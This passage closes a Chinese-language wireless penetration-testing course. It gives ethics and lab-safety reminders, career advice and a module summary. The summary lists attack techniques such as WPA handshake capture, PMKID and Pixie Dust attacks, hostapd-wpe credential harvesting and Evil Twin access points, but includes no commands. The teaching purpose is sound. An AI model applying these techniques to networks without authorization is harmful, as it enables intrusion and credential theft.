  - 红队的目的是帮助组织发现和修复弱点
  - 永远不要在未经授权的情况下攻击他人网络
  - 发现漏洞后应负责任地通知相关方
  - 不要公开分享破解的密码或凭证
  - 在网络攻防中保持专业和道德

WARNING 实战安全
  - 实验环境必须完全隔离
  - 使用专用的测试路由器，不要在主网络上测试
  - 攻击可能意外溢出到周边网络
  - 注意辐射功率和频率法规
  - 保护好你个人的无线设备和网络

WARNING 职业发展
  - 无线安全技能需求持续增长(IoT/5G/WiFi6)
  - 考取相关认证: OSWP, CWSP, CISSP
  - 参与合法CTF竞赛提升实践能力
  - 贡献开源无线安全工具
  - 持续关注新的攻击方式和防御手段


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
课程总结
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

通过7个模块的学习，你已经掌握了：

  Module 01 - 无线网络基础
    ✓ 802.11协议原理
    ✓ 无线网卡选择和配置
    ✓ 监听模式基础

  Module 02 - 无线侦察与扫描
    ✓ 全信道和定向扫描技术
    ✓ Kismet深度分析
    ✓ WPS发现

  Module 03 - WEP破解
    ✓ WEP协议漏洞原理
    ✓ ARP重放攻击
    ✓ aircrack-ng完整流程

  Module 04 - WPA/WPA2破解
    ✓ 4次握手原理
    ✓ 握手捕获(被动+Deauth)
    ✓ PMKID攻击
    ✓ hashcat GPU破解

  Module 05 - WPS攻击
    ✓ WPS PIN设计缺陷
    ✓ Pixie Dust攻击
    ✓ reaver + bully使用

  Module 06 - 企业无线攻击与Rogue AP
    ✓ WPA2-Enterprise攻击
    ✓ hostapd-wpe凭证收割
    ✓ Evil Twin/钓鱼WiFi

  Module 07 - 无线安全综合实战(本模块)
    ✓ 完整渗透测试流程
    ✓ 多工具协同
    ✓ 报告编写
    ✓ 安全加固建议

  后续进阶路径：
    → SDR(软件定义无线电)安全
    → 蓝牙/BLE安全
    → ZigBee/Z-Wave IoT安全
    → 5G无线安全
    → RFID/NFC安全
    → GPS欺骗

================================================================================
  模块07结束 — 恭喜完成archstrike-wireless全部课程！
================================================================================

  记住：获得知识是为了更好地保护，而不是伤害。
  用你学到的技能让无线世界更加安全。
